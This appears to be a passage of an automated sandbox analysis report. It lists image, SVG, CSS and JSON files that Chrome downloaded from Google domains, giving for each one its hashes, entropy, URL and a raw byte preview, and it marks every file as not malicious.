                                                                                                                                                                                                                                                                                          SHA-512:A5B26E6CDD858E8861686B462B9A1AFC2B87E92307D314E7CCC8627F3AF4FD50062F838C8578B1D460D3F92D16A36A77A7BEE28159F227EA597D6D7D74962D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/79/54/dfa9dced4f789f5c181b6c520d76/bgimg-commuting-dark-p-1080-jpg.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF.N..WEBPVP8 .N.......*8.C.>m2.G.#"#.......ej..v,.rw.P..+..G. ...A.......G.....oqw...5.....z.s......._.8{g.../.r..C....O_;...8._.....w..7....?.........n..;...........O...|........?.{............|...(/....%...of..~.z.r..3.C...o.Og......>...7.\.~.@...j.Xb#..R.W.l.:G..W....RvnX.P)..D............@.).^..1..6.."e#U.o.3<.p.-....$'..3....}y...7.X....5.l.P...R.|.c.72...9f`(..e...J...ZD...."F.a.m..~2..nL.gp.o...n.%.k....XE..W...!.e.Q...7....~...W...c....F...f6..c{3`.....E.*.h....x9.g....7.3..3...H.c.%....Y..pq._=F.~.Q....R....p.9......WOP.6F..;.l.D.\./.......Kb.d.K.N.......H..........e..~.@v...&.g.*.<.Jjp<....>i..H^.*.....q[....\g.+..b.<..]..o.%e.o......z.#w.Lv.(..@N.C.$.*...SH..s......../...z.........p,../.....)pG...|...%"..|....k.+O....d.~...Y}.....;.....p.}.g..!..9....Cw./..Oqd.<U.6...y.k`..L.z....b....._.e.....M..L... ......O..@..).BR_O..[.P#...aD...5..QJ.vg.l.1...'....Zjr.....:.X..Y...Z.#r..8......W...b./`......-.1C....$9.V2TWp..S......M).w.k.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):398264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.825868203640533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:g+8tcJnW7o4atIaKozdbA4pQcYu/rvqwXTEPz1Jvrch1BrE1dzCmrW:g5EnW7o4atIHo9ATruTvqQg7vcrWC
                                                                                                                                                                                                                                                                                          MD5:4D91CA67646C19DA465C89B5AE5374D3
                                                                                                                                                                                                                                                                                          SHA1:F16ED92525A0083A270797D948FA8234EC7A6EA1
                                                                                                                                                                                                                                                                                          SHA-256:C85ACC2D7CE84C9853ABFEA0A4CBE7323E067CC274CCE6A3FB4EFAF279B2E3BF
                                                                                                                                                                                                                                                                                          SHA-512:03A4B5AB1AC721D0874FD4BD381144B7D7DB71F4E81B4B3CF6FDA59924D0D7C12923CA417A6F64E98E4719CEB5546987616E4EA19849304C69F141EC287F922F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..D..u!...2..M..w..K......^.C..^...d8g.S.UP|....>.m#.~.pf.D.@.XH...p.....O..Ru.(mR.0W.....|.N.[.]n..j..?.s.@o.tu..=..O...#o9...>).Jk....VF.I..%.....~..g.....`H...*..............`.....`...{..}.{_......v:..X0aH..3..~.....9.t.?..9...N.l...6..v.p.....b.f....vo..'.sN..YTa.k.........K:-.:...'Z.mo#g..7v...JD.r....p...r.s...Y,.Y.r..I9{$.i*T...z..>].MUw.Rh.......yj.~e..m..eLP.....:;.[...}.q....#....R....z.....:X(A.......`.O......*..Ab$I.$yV.3...t..H..I..}._.c...Sk.m.m.......P..........>...o..ki.....}.Kx.........S_..9{R@.7..m{6...8...'Uu....F...d...g.+.....I...l#....:..z.}_.y..........$I.m.e.Y.Z.c.9.Z..cff...>23....k..{oU..I.$I.mK".5_{.{#".r...f.QG...9{-w..X.mUm^...s.7.....m.nc.*..1..@'/...oo.....'..x.7...!/..s..[I.D...I.../.UK..k.....U3sHf..d....A......s..$.k.U...\k..............Z\...k..r..d.....ED.}.*..1................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                                                          MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                                                          SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                                                          SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                                                          SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:P:P
                                                                                                                                                                                                                                                                                          MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                                                                                                                                                          SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                                                                                                                                                          SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                                                                                                                                                          SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                                                                                                                                                                                                                                                          Preview:{}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x384, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):39975
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.956038562229301
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:Yp6ZaktUB9oQ9N62ex6rTFt6CWh6sW/mWy+x0TGWGuwJHENfJJak:YcPdQyeFAh6sWObW0T4ZHol
                                                                                                                                                                                                                                                                                          MD5:AD9E05AA6369227CA1148D86159B5418
                                                                                                                                                                                                                                                                                          SHA1:0992E7FC72D8651714D3E3226FCDA5F140AC091E
                                                                                                                                                                                                                                                                                          SHA-256:4E1FFDC86847DE0C72A4E3BCF0B559E65B439CAD79FBDBDAA8F30B6DDCE2D48D
                                                                                                                                                                                                                                                                                          SHA-512:09960A794B29AF6A5F61AAE794D417565388B8EEA844F5359EDE77FA4580C7274CFEE2BB09DC561B384FB5A34AAB7A0EB377C8A67BA376E37A462707F30374E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF.....................................................................................................................................................................................................X........................!..1AQ.."a2q.....#BRr..3b...$CS...........Tcs.....5DEU...%4t..................................;........................!1AQa.q....."2....B.R.b#$3Sr.................?..%dy.P.j...&.C@%.....@%..4 CB...-@!....,h.&.C@.....@........&..@6.@6h.j....@.....o.e.|I...s.e....X..w......8.Ov.....%.np~..1..sD$..W1....9rJPeQ{e6.....o...f..4....8..X..5&......wk.'..I`.8...K..8"..oq..]..R.9+&m.....H.~.....M_*".....QbL.....\..........l..X}...M..=...C.."oa..r...s.B}.z.Hj9\U2.;..d.#_.S<r....x..^.....WP....B..'....}....^....r.f..^...T.l....yi~c.9..2.D.....q..........Y...+.....h.Kxl.......mx....Q...8m..Ojl.r.lAgnzt'K...xi^..fW...".X H._.......].2x..MI.a.....E.HA..)f9...g.U....t...%.E..W.hoZ..JdD[......U/.8$.?u.-.[...Q......6..V.\>b....RH..".bT6RG..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1219
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):585
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.5846961799152
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XmH0Cr2GaIXUU4BhMMEYvYH43rYYt+nVQznD4c:XmUu2GfXUU38vqqcYtXD4c
                                                                                                                                                                                                                                                                                          MD5:E3D9748C81AC295A0263A704C651AE87
                                                                                                                                                                                                                                                                                          SHA1:328E3DC94CA64D9E613A382505C5EDFFB9EC0978
                                                                                                                                                                                                                                                                                          SHA-256:E6AE5FC86E67466EEF356E093EC4AC198E49DA0E01346093532E28F95450AEF2
                                                                                                                                                                                                                                                                                          SHA-512:3E8D8144640170262C35DFCD19DDDDC7182949E5043EE302396E0E049A77A422D33AABA3895835406E91110F42157BBE71DA057AA1E2F6CA4F5DD3D9EEDB64A9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........\T.n.0...+...5."E.Q..5...Z......V>?...S.0..jwggH....7.aw...5.t..W..<.?..3..g....8...4Y...xz..|.^~l6..................u...o...`..t:.v..:....v.}....a....GQ.....T{.gd.d...J).1S..#...0FW./.)T...P..h...y..&Q.h.....z^...!..;.;40...tT+..G.F...CXs=...$.C.c.0qK.....Q2.8.g.......!.......H"..*.....#xZ,0e. ...Q..(@.&.\\-...S....x.L.......=.m..\.H..."......,.M..<..|..h.\.b.....E.x.....E...K.G.p..e......@............Y..4;..SlP....r..}.~...~p+.R...|..8:,...Ij....E....i.+.........|._....>d.@..+...<.Q.&KD..w.5"n.+t..............\..|[...............e....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):323693
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986068807868667
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:jCZe/GmUFwAl6L240d3d0EHEmlMH+acoh0uBScbxJ6BOypcdjavgtbZbP:uZSGwAQi400MSH+JFwbxW/cxavgdZj
                                                                                                                                                                                                                                                                                          MD5:C19A35B9FBABC519C356B7A8FF127C55
                                                                                                                                                                                                                                                                                          SHA1:DAC23554B6E97E8F7FE0FD354406587D66170A9D
                                                                                                                                                                                                                                                                                          SHA-256:C5E75F3FA399C432FD34B737C23D79504819E25FC4464D19A94A16DBB2AC4CD9
                                                                                                                                                                                                                                                                                          SHA-512:54EC86ACA719C35C1B691A07CB8FE9D238EE11615C41B81D9D0AD2E78994B87E8A02FBB041300D8E3706E941FD2445D5C254EEA0EB05B0DC5BEE96A1DAAF1D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/M24xvmPiIlXRQb7ReNXBDMRot0s_5GMSLkP08p5mb9s7bJYkuMcz6kFjeEhCIp6yikIZVfDrOjvgHzHxhSusOQkyC4VajtQxOHRMiazmvDLP_P3JjA?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t...4IDATx.L.Y.t[....f5.....}v73.*.!Yd..D.&A.....~....?...~.a...7.%X. .@.E.%..*feS73o67o....nwk.9.....N. v..;f3..c...?.'....`lF.f.........."...( ....". ..(*.. ...!2...h..`.`.....@.|.<..!.2..K..!..C$.F."T3@`".@4....M.F.....<...O.?.v...J..M..P.((fP.c@.#.P.....7....."1....|..o....V.".BDDl...`.h.`.p. .h..D...&.@.Q........NW..........0#.#...).).) :0BD2D3#......0..)."..!......b.?....M0..........'.<Z[...\.w?......{.?....?x...8.Y.X.....o?....72.../.....?.......x..'..'.....?.2..p...D>.C.x......)..fK.....Y...tx.......|.[..........s/q?...|...9..~w..Y....]...~..B..p.z..J.s...s.A..s>$...H%..L.@2.c].7.O.../.....( ..).....0.N.......?...2^}........}....,7R-.l.851.*...=..F&9{t.<..3J1.......gI..c.5.j..oF..d..2......p..C..!...r.4...[TuU..*(8.n..1..4......\;B-2...x.S.....X...)jRun]..G.......O....uk..j..on.uy...X.l.6......*..q....Y......#5hmW.v&......n.G..<..H...7....{i....q.y..zs.<...e.h-8T..R.b.\.:>..t-F..@`.S..StI.....~....~~.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):856973
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.207864904320368
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:WIGQ/GQbGQNPk77Ft+OvKdR/km76tmOoKeR2:jk77Ft+OvKdR/km76tmOoKeR2
                                                                                                                                                                                                                                                                                          MD5:726FE9EE67B6FCE30D358F32F337EDF4
                                                                                                                                                                                                                                                                                          SHA1:4851A9095AB0E71308274FC729B6809DACEE9077
                                                                                                                                                                                                                                                                                          SHA-256:24489E34A728C22264D1CBB1CF838D904631B6F69DC0AF648848747BC3905534
                                                                                                                                                                                                                                                                                          SHA-512:83BDD2A81331006FE7F77EFB2EC0F72D16B6D47806B3945C2C2DF2972473BA9798DFCF0F1CA590637368A256451B8DBD31FAD58892AC2F77FF358A9A3C2809C0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://about.google/assets-products/css/index.min.css?cache=4851a90
                                                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:0 0}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{co
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/23ispX_lvsTfMdqVu6ra84IGV85IwhGPQyogx4AOuECIOQYVFewlJ0p4XkFbUoAJXDlc4LwopHv1SNEslf1B4XCDZg0P-85zw3DQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7717
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.964739325563882
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:OSlMgKu4t7io7N/LkDKaPW3wMJ7jO8k0O0EV/64rx:xldKusGA/LkDKwjMJ7jOZ0i44rx
                                                                                                                                                                                                                                                                                          MD5:F303B5D83D1CA82787B6FBFF3E5CFFE7
                                                                                                                                                                                                                                                                                          SHA1:ECCFF3C0008ED7381DE1ACF4B26A633E3F0838B1
                                                                                                                                                                                                                                                                                          SHA-256:167B2BD49F989938F884C74A1C9A9D2D3B8BC8F88F23BDA67ECA219D91496199
                                                                                                                                                                                                                                                                                          SHA-512:DB12766D73D2E28747F9C67D06D527E6DA0B601CDDA046C6CD884FDE662F9E2053F8A61F3BB300F910D4D39142948CA73BDCE90A90B7183C27DDD7E113A68288
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/yemTWtzfavZZqaWs0_ijOcSrLtp93cAfiJA4HqGSpJNYBxe13WWQxeqV7xt7Bdf34Nug2nw2z-a4T85pXURHj8tcOPFh1-l7BvYANqrAXd7zHVQ93x0=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................IDATx..y..U}.?...>../........\.....G.Fc.<F.$.K.F.[..b.B..Q......4.W.E@p.3.0....O.U]U.9...[{..]]U=....<...S.N.....DUY..9..X..b..%.e..8..^.X&x.c..%.e..8..^.X&x.c..%.e..8..^..*.......Hl.%......EQ!._.U.Eq(V./7@n.vf6.5..!.ZT.O.........y..G....|......?.8'..3..O...l.F.....0.8.}.....n`J../ ............,^L..Q...z8....;.(.....XL.[...<....yYk0..{B..L.x<.....c.O.L&c...y.2..(Be.h..~...E... .G..y...2UN...h....C.9.9..._..{.....K.`.D....j..Y"..h.+U...bu.._..8.{._'..K..;....*W9.Y]..G.7.....1..*-......a.r..r3.s.E.....z..-.v...}:..#X.....zQ.|...(..".)...6.......K.`.P}.s..2z.g...60_.1_3..?.h,n.....9..L....T.....%.....7..#.!b"......?...@.....vN^[.=.X...@..|....BP)....b.....x.. .s.....1.EK....0q,..A...J...7.1...,^r...g..vk.N.U'Rm/Z.....L.>.?a...rI..H.R..x.<.PF1..*..u.!TOH.i..,&.....&..8.B@.P`..#.......<.....}........m..-...B2..+....yV....sx..u...g.".).z7...H....Z].h..`.l..o..4.$..{;.....=.............'q.......&.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, orientation=upper-left], baseline, precision 8, 640x531, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):31840
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8882022052139416
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:L3v49Qh96UMPBm0OX7Lglf7g4tRxLcPjIgDU4TlabSZ:L3RyUuOX7k7g4xAPkiU0aba
                                                                                                                                                                                                                                                                                          MD5:9521A70C6A85612734FE15606DA9EBCC
                                                                                                                                                                                                                                                                                          SHA1:FA25E39CABBF6277EAEFA588B75B4781AC12B620
                                                                                                                                                                                                                                                                                          SHA-256:B3DF051FB27C36026C6E709CA7A57292448D3B8CA64D1506B934E3F7DE601A6A
                                                                                                                                                                                                                                                                                          SHA-512:FB0B00722F0F33DFE9AE71BA53AEC5E1FFC739A27121BF9E562468F1436C42AEAEE796E49514D62E22B881FC1A40D20873F2B4553626BE82BBAED264573E9C76
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF............."Exif..II*..........................8Photoshop 3.0.8BIM........8BIM.%..................B~...(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n................................................................................................................................................."..........................................a..........................!"...12BAQRbrt..#5aqs......$346u....%&.....D...CSdv.....'7c....ETe..................................6................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 553x371, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):28312
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992927101794351
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:CzruHVxI3Sw12e3mcxvCw/H/uBwe7w4elkEC:CHuHVxICw0cxv9/H2x7blEC
                                                                                                                                                                                                                                                                                          MD5:91B424CCBA8F7448351AC276FB742803
                                                                                                                                                                                                                                                                                          SHA1:A258192257191445763FBA05D07BD55D9CD6E356
                                                                                                                                                                                                                                                                                          SHA-256:54DC2D07131CAD43F7041F43E1D78804731E3AB018BE87F1FF763502276DB9C4
                                                                                                                                                                                                                                                                                          SHA-512:A9FC8A06D12C5F71B07D2376BF884021BD943D58F2652115D93F2C123C88ACF7E2D6F0BCDF46E090876FAA88652486640BA8A7F8E51200D80AEB56CABFD4720C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/64D8NAal4fL-YIlpSt4qu4jr2dC1IAHgFvJzIdzUP5FhlblZfk6BwzWPT-qc6UB5x25BYKvkT9hzD4mRCL_v3YxNs6IXybItulFsUdX479-MSXYV71mg=-w553-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:RIFF.n..WEBPVP8 .n..p....*).s.>E .D..!.)..(.D.._5w......>.Y.....y..?]...}....?5....K...........|~........a.....k.....P.....}.?k.......9.j.............U.%.$.......x.`.G........Q..e_Uz....o...~...........b........._...}fw.\.A.u>..;....?......_..p/..?.............{..D...;...........~....../.......?....G.C.......tO.......;..jG.M..........G|u...9 .'..E..s.2g...c.?6...G.8..3z.&_o.=I.W..k..|.o.?!Q.:......-..O..j)...;....g..8..\.wIr....`.1.1v.m..G..B5.....yH.Vs.._..o8......q.....%.=.~B..[2:g.9..."S.:D_..B/.e.~cd.64....YtM....Bh?.W+._a8.4...*+.5v.&..8...XJ.c|S....).U..9....G_...#....Q..|.$.E..Z.K........{xnP.7_.Z........Y9.7..]....K.}...b..L.....nsb.R......i.|a_;?....Eu'.|?.......l..F(|..}%.M.F|.:.x...\.).fh.w@eQ..#jV.......:fa..D|@...L%:..M.lb~........I....0....5.......E~H......R..v]w.^..u..=......F.-.R.Z.~..{L."/......C!....9.i.(....u.....K.:.-.F. MVZ..Ovc.......{]....E.1J..............K.u..i....a,..8...F(O+..C...\.w.&?EX.+._.q.{.......B+.....b...6j.)..Q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8143)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):12082
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2555966381964305
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:sZWPNSRE7yMrMyTLI4ULe6mMp/GmTwMFGDd/yW7QpuXiYBAt:sZQNSRE7J4yHI4qmMdGiwMF6H7QpuXhg
                                                                                                                                                                                                                                                                                          MD5:C215A840970465B3908303ACA3C72BA0
                                                                                                                                                                                                                                                                                          SHA1:EF86515C51B74C2369AF9875CC73714A76BF3274
                                                                                                                                                                                                                                                                                          SHA-256:195F1E676AC9D3253F0F8F8EE03DA25A9D9797FC257F661810CC9C467CE0292B
                                                                                                                                                                                                                                                                                          SHA-512:8746D6EB040D1419143FF177CA8A8507FD7ABCFDD14427495354D4F19CC97C9391D9767D290DB14DBFEDD1262EDD44E7127175BE12E46D880BBEE539AF3E2A25
                                                                                                                                                                                                                                                                                          Malicious:false
